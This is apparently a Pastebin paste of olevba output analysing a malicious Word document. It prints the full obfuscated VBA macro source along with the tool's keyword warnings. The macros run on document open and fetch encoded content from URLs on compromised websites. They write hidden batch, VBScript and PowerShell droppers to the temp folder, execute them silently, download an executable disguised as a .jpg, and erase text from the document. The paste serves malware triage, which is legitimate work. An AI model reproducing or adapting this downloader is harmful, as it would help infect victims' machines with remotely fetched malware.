Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- olevba 0.25 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MAS-HB- edcsrp~1.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: edcsrp~1.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: edcsrp~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub ZJhcjkhjwqhdjqw_Open()
- End Sub
- Sub Huqwhdkqwhdjkqw_Open()
- End Sub
- Sub Auto_Open()
- Zjdihquhwqid
- End Sub
- Sub Zjdihquhwqid()
- HYQDUGWQ = "nj21he jg2hj21ge"
- Ynqhbdjhqwb
- End Sub
- Sub Giqjwdhqwkjq()
- BHBDJHWQ = "behj21ghj12"
- End Sub
- Sub AutoOpen()
- JAHSDJGHQW = "jr3 2jhjk2gr2"
- Zjdihquhwqid
- End Sub
- Sub Workbook_Open()
- LJKLJWDKLQ = "bhjgwqhjdgqj "
- Auto_Open
- End Sub
- Sub Ynqhbdjhqwb()
- Dim fallout As Integer, silkroad As Integer, inclife As Integer, inredible As Integer
- Dim retVal As Variant, gana As Integer, turkey As Integer, malay As Integer, SPAIN As String, BOLIVIA As String
- BOLIVIA = Chr(90 + 2)
- ANGOLA = Ubqhwdhwqbd(16137) + ""
- SPAIN = Chr(84) & "em" + "p"
- QHDQUWH = ANGOLA
- FL2 = QHDQUWH
- PH2 = Module2.Goabc(SPAIN) + BOLIVIA
- silkroad = 9
- jwnqdw = -1
- BOSNIA = 8719723
- BOSNIA = 1 + 1 + 113 + Sgn(jwnqdw)
- BALAGAN = BOSNIA
- JWIDJIAAA = ""
- QIWJDABB = "b"
- HUYFEA = QIWJDABB + "a" + "t"
- PSFL = FL2 + "" & "" + "." + "p" + "" + Chr(115) + Chr(49)
- gana = NUqwdqwbdsad(1 - 300 * Sin(20))
- SSS = Chr(BALAGAN + 2 + gana)
- VBFL = FL2 + Chr(50 - 4) + "v" + "" + "" & "b" & "" & SSS & ""
- BAFL = FL2 + Chr(NUqwdqwbdsad(Fix(-22.043)) + 31 - 10 + 25 + gana + 2) + HUYFEA
- INTG = "" & "o" & "bject"
- KIWD = Chr(110 + NUqwdqwbdsad(Len(BAFL))) + "dule"
- AFTG = Chr(109) & KIWD
- SXEE = Chr(46)
- SXAA = Chr(101)
- SXE = SXEE & SXAA & "" & "xe"
- GNG = Chr(2 ^ 2 + 42) + "jpg"
- HUQD = Chr(30 + 16 + 1)
- ATTH = "ht" & "t" & "" & "p" & ":" & "//"
- BQHJDQ = "sa" + "vep" + "ic" & Chr(46) & "su" + HUQD
- PSPTH = PH2 + PSFL
- VBPTH = PH2 + VBFL
- BAPTH = "1jh2ekh12kehk12he j12g e21"
- ABPTH = PH2 + BAFL
- BAPTH = ABPTH
- JHQKWDQAASS = BQHJDQ
- Dim BALAGANHUQW As Integer, DRT As Integer, BFT As Integer, CFT As Integer, DFT As Integer, EFT As Integer, CONT As String
- DRT = 315
- BFT = 316
- CFT = 317
- DFT = 318
- EFT = 319
- Dim NUWDHUQHUQWDH As String
- NUWDHUQHUQWDH = "" + "USE" & "RPROFILE"
- Dim PBIn As String, asdwq As String, MIWDWQ As String
- TSTS = "." + "tx" + "t"
- CDDD = "78672738612836" + TSTS
- LNSS = "f" & "a" & "f" & "a" & "" + TSTS
- STT1 = "phudge.ca/w" + "ordp" + "ress/w" + "p-con" + "tent/themes/can" + "vas/inc" + "ludes/.svn/props/"
- STT2 = "kedros.ch/mod" + "ules/m" + "od_ara" + "ticlhess/"
- PBIn = ATTH + STT1 + CDDD
- CONT = Module2.Linolium(PBIn)
- asdwq = Rasdas(CONT)
- HQUWDAAA = "0"
- If (asdwq <> "=") Then
- PBIn = ATTH + STT2 + CDDD
- CONT = Module2.Linolium(PBIn)
- asdwq = CONT
- HQUWDAAA = "1"
- End If
- CONT = Quqhwdbyas(asdwq)
- Dim ahuywdgqy As String
- TVT10 = Port(CONT, "t" & "ext10")
- TVT20 = Port(CONT, "t" & "ext20")
- TVT21 = Port(CONT, "t" & "ext21")
- TVT30 = Port(CONT, "t" & "ext30")
- TVT31 = Port(CONT, "t" & "ext31")
- XPT1 = Port(CONT, "stext1")
- XPT2 = Port(CONT, "stext2")
- XPT3 = Port(CONT, "stext3")
- WVR = Module2.Goabc(NUWDHUQHUQWDH)
- hufehu1 = InStr(WVR, "sers\")
- Dim hudhw As Integer
- Dim ghdAdd(1 To 3)
- ghdAdd(1) = "1"
- ghdAdd(2) = "0"
- ghdAdd(3) = "0"
- If (hufehu1 <> 0) Then
- ghdAdd(1) = "2"
- Else
- ghdAdd(2) = "3"
- End If
- JHWQUD = Join(ghdAdd)
- hudhw = Val(JHWQUD)
- Module2.Crispy (1)
- MIWDWQ = ATTH + STT1 + LNSS
- If (HQUWDAAA = "1") Then
- MIWDWQ = ATTH + STT2 + LNSS
- End If
- SEXX = Module2.Linolium(MIWDWQ)
- PSTB = PBIn + "123123123"
- MSTAR1 = JHQKWDQAASS + "5751812" + GNG
- MSTAR2 = JHQKWDQAASS + "5757956" + GNG
- STAR1 = ATTH + MSTAR1
- STAR2 = ATTH + MSTAR2
- FFQ = "8"
- FF = FFQ + SXE
- If (hudhw = 130) Then
- Open BAPTH For Output As #DRT
- Print #DRT, XPT1
- Print #DRT, ":jadkjasghdjasg" & vbCrLf & "set trfd=" + Chr(34) + PH2 + Chr(34)
- Print #DRT, "set nmsj=" + Chr(34) + FL2 + Chr(34)
- Print #DRT, "set exds=" + Chr(34) + FFQ + Chr(34)
- Print #DRT, XPT2
- Close #DRT
- Module2.Crispy (1)
- Open VBPTH For Output As #BFT
- Print #BFT, "strRT = " + Chr(34) + SEXX + Chr(34)
- Print #BFT, "statRT = " + Chr(34) + STAR1 + Chr(34)
- Print #BFT, "" & "jfeu" & "ygq = " + Chr(34) & "" + FF + Chr(34) & ""
- Print #BFT, "strTecation = " + Chr(34) + PH2 + Chr(34) + "+jfeuygq"
- Print #BFT, XPT3
- Close #BFT
- BDDT.Crispy (1)
- NTH1 = Module3.HowEver(retVal, BAPTH)
- End If
- HUDQG = "';"
- If (hudhw = 200) Then
- ZPQSKD = FL2
- Open PSPTH For Output As #CFT
- Print #CFT, "$bhjdgqwdg = 'qbwdjhqbwgd';"
- Print #CFT, "$bqhdwjqwdd = 'njqdhjqwdqj';"
- Print #CFT, "$stat = 'ht'+'tp://'+''+'" + MSTAR2 + "';"
- Print #CFT, "$ggtt = '" + SEXX + "';"
- Print #CFT, "$pths = '" + PH2 + HUDQG
- Print #CFT, "$wehs = '" + ZPQSKD + HUDQG
- Print #CFT, "$nnm = '" + FFQ + "';"
- Print #CFT, TVT10
- Close #CFT
- Open VBPTH For Output As #DFT
- Print #DFT, TVT30
- Print #DFT, "c" + "urrentFile = " + Chr(34) + PH2 + Chr(34) + "&" + Chr(34) + FL2 + Chr(34) + "&huih"
- Print #DFT, TVT31
- Close #DFT
- Open BAPTH For Output As #EFT
- Print #EFT, Chr(30 + 30 + 4) + "echo off" & vbCrLf & ":jqduqihdjsakd"
- Print #EFT, TVT20
- Print #EFT, "set Ads3=" + Chr(34) + FL2 + Chr(34)
- Print #EFT, ":hdjqkwhdqhwd"
- Print #EFT, "set Mts4=" + Chr(34) + PH2 + Chr(34)
- Print #EFT, ":ajhsdkasghjgsd"
- Print #EFT, "set Rts4=" + "%Mts4%%Ads3%"
- Print #EFT, TVT21
- Close #EFT
- Module2.Crispy (1)
- NTH2 = Module3.HowEver(retVal, BAPTH)
- End If
- JUW = Chr(47)
- AKK = Chr(60)
- ZKK = ">"
- NTH3 = Module3.India(AKK + INTG + ZKK, AKK & JUW + INTG + ZKK, 1)
- NTH4 = Module3.India(AKK + AFTG + ZKK, AKK + JUW + AFTG + ZKK, 2)
- NTH5 = Module3.India(AKK + INTG + ZKK, "", 3)
- NTH6 = Module3.India(AKK + JUW + INTG + ZKK, "", 3)
- NTH7 = Module3.India(AKK + AFTG + ZKK, "", 3)
- NTH8 = Module3.India(AKK + JUW + AFTG + ZKK, "", 3)
- End Sub
- Public Function NUqwdqwbdsad(a As Integer)
- NUqwdqwbdsad = Sgn(a)
- End Function
- Public Function Hhqudhqwgyuqwaaa(a As Integer)
- Hhqudhqwgyuqwaaa = Sgn(a)
- End Function
- Public Function Ubqhwdhwqbd(a As Integer)
- Ubqhwdhwqbd = CStr(Int((a * Rnd) + 10000))
- End Function
- Public Function Quqhwdbyas(ByVal strData As String) As String
- Dim objXML As Object
- Dim objNode As Object
- Dim asduiwhqdqiw As Integer, nudqwd As Integer, sshquwdq As Integer
- nudqwd = Tan(12)
- 'MsgBox ("tangens:" + nudqwd)
- asduiwhqdqiw = Hhqudhqwgyuqwaaa(nudqwd)
- QHDHUQW = "" & Chr(78 + asduiwhqdqiw) + "SXML2.DOMDocument"
- Set objXML = CreateObject(QHDHUQW)
- Set objNode = objXML.createElement("b6" + "4")
- objNodeS = "j1h2 ehgj12hj12 ejg12e1"
- objNodeE = "g21eh1"
- objNodeQ = "1j2ge h12"
- objNodeZ = "dbjsahs "
- objNode.DataType = "bin.b" + Chr(97) + "se" + "6" & "4"
- objNode.Text = strData
- WUDHA = objNode.nodeTypedValue
- Quqhwdbyas = WUDHA
- Set objNode = Nothing
- Set objXML = Nothing
- End Function
- Public Function Port(a, b As String)
- Dim krd, tent As Integer
- UQWD = Chr(50 + 8 + 2) & ""
- NDUW = "" & Chr(70 - 8)
- krd = InStr(1, a, UQWD + b + NDUW) + 8
- tent = InStr(1, a, UQWD + "/" + b + NDUW) - krd
- KLMN = Mid$(a, krd, tent)
- HUQHWDA = KLMN
- Port = HUQHWDA
- End Function
- Private Static Function Rasdas(a As String)
- Rasdas = Right(a, 1)
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- | AutoExec | Auto_Open | Runs when the Excel Workbook is opened |
- | AutoExec | Workbook_Open | Runs when the Excel Workbook is opened |
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Open | May open a file |
- | Suspicious | Output | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Print # | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module1.bas
- in file: edcsrp~1.doc - OLE stream: u'Macros/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function Xjdkhjfwefw(a As Object)
- Xjdkhjfwefw = (a.responseText)
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO Module2.bas
- in file: edcsrp~1.doc - OLE stream: u'Macros/VBA/Module2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function Goabc(sps As String)
- NJBHVGASVD = "h1j2 hjeg1hj12geh 1221ek l12j12e"
- NJBHVGASVD = "h1j2 hjeg1hj12geh 1221ek l12j12e"
- NJBHVGASVD = "h1j2 hjeg1hj12geh 1221ek l12j12e"
- Goabc = Environ(sps)
- End Function
- Public Function Linolium(nbqjbdjqw As String)
- Dim dhjqwqkjww As Integer, aaqjwhdq As Integer, Kjqiwdhqwuhdjqkwhdjkqwbd As Object, AHUDWQI As String
- Dim ashdUHhda As String, hausd As Integer
- ashdUHhda = nbqjbdjqw
- hausd = Tan(12)
- BQDHJQWDGWQJGS = "MS" + Chr(93 + 5 * hausd) + "ML2.ServerXMLH" & Chr(85 + hausd) & Chr(84) & Chr(80)
- 'MsgBox (BQDHJQWDGWQJGS)
- Set Kjqiwdhqwuhdjqkwhdjkqwbd = CreateObject(BQDHJQWDGWQJGS)
- Kjqiwdhqwuhdjqkwhdjkqwbd.Open "GE" & "" & "T", ashdUHhda
- Kjqiwdhqwuhdjqkwhdjkqwbd.Send (AHUDWQI)
- Linolium = Module1.Xjdkhjfwefw(Kjqiwdhqwuhdjqkwhdjkqwbd)
- End Function
- Sub Crispy(NumOfSeconds As Long)
- Dim SngSec As Long
- SngSec = Timer + NumOfSeconds
- Do While Timer < SngSec
- DoEvents
- Loop
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+--------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+--------------+-----------------------------------------+
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Open | May open a file |
- | Suspicious | Environ | May read system environment variables |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- +------------+--------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module3.bas
- in file: edcsrp~1.doc - OLE stream: u'Macros/VBA/Module3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function India(dnuwhd As String, b As String, c As Integer)
- Dim selectedText As String
- Dim ssjidoqwhduqhwidqwudihq As Range, lesleslesqjhdjqkwhdwq As Range
- Set ssjidoqwhduqhwidqwudihq = ActiveDocument.Range
- BYHQGDJHWQ = "KH21E JK12GJFHE G21HFEGH12F fghf eghewf jhg hjsgfhjghj3g j12"
- BYHQGDJHWQ = "KH21E JK12GJFHE G21HFEGH12F fghf eghewf jhg hjsgfhjghj3g j12"
- With ssjidoqwhduqhwidqwudihq.Find
- 'BYHQGDJHWQ = "KH21E JK12GJFHE G21HFEGH12F fghf eghewf jhg hjsgfhjghj3g j12"
- 'BYHQGDJHWQ = "KH21E JK12GJFHE G21HFEGH12F fghf eghewf jhg hjsgfhjghj3g j12"
- .Text = dnuwhd
- .MatchWholeWord = True
- ssjidoqwhduqhwidqwudihq.Find.Execute
- ssjidoqwhduqhwidqwudihq.Collapse direction:=wdCollapseEnd
- Dim wdwq As String
- Set lesleslesqjhdjqkwhdwq = ActiveDocument.Range
- Dim wdsadwq As String
- lesleslesqjhdjqkwhdwq.Start = ssjidoqwhduqhwidqwudihq.End
- .Text = b
- .MatchWholeWord = True
- .Execute
- BYHQGDJHWQ = "KH21E JK12GJFHE G21HFEGH12F fghf eghewf jhg hjsgfhjghj3g j12"
- BYHQGDJHWQ = "KH21E JK12GJFHE G21HFEGH12F fghf eghewf jhg hjsgfhjghj3g j12"
- ssjidoqwhduqhwidqwudihq.Collapse direction:=wdCollapseStart
- lesleslesqjhdjqkwhdwq.End = ssjidoqwhduqhwidqwudihq.Start
- If (c = 1) Then
- selectedText = lesleslesqjhdjqkwhdwq.Delete
- End If
- If (c = 2) Then
- lesleslesqjhdjqkwhdwq.Font.Color = wdColorBlack
- End If
- Dim hduwaa As Integer
- hduwaa = 1 - 2 ^ 4
- QHUDW = Chr(10 + 23 + Sgn(hduwaa))
- If (c = 3) Then
- With ssjidoqwhduqhwidqwudihq.Find
- .Text = a
- .Replacement.Text = QHUDW
- 'BYHQGDJHWQ = "KH21E JK12GJFHE G21HFEGH12F fghf eghewf jhg hjsgfhjghj3g j12"
- 'BYHQGDJHWQ = "KH21E JK12GJFHE G21HFEGH12F fghf eghewf jhg hjsgfhjghj3g j12"
- 'BYHQGDJHWQ = "KH21E JK12GJFHE G21HFEGH12F fghf eghewf jhg hjsgfhjghj3g j12"
- 'BYHQGDJHWQ = "KH21E JK12GJFHE G21HFEGH12F fghf eghewf jhg hjsgfhjghj3g j12"
- .Wrap = wdFindContinue
- .Execute Replace:=wdReplaceAll
- End With
- End If
- End With
- End Function
- Public Function HowEver(hqwdugqw As Variant, hasdgja)
- BHQJGDWQ = "1b2hej g1h2e21j"
- hqwdugqw = Shell(hasdgja, 0)
- HowEver = hqwdugqw
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+---------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+---------+-----------------------------------------+
- | Suspicious | Shell | May run an executable file or a system |
- | | | command |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- +------------+---------+-----------------------------------------+
Add Comment
Please, Sign In to add comment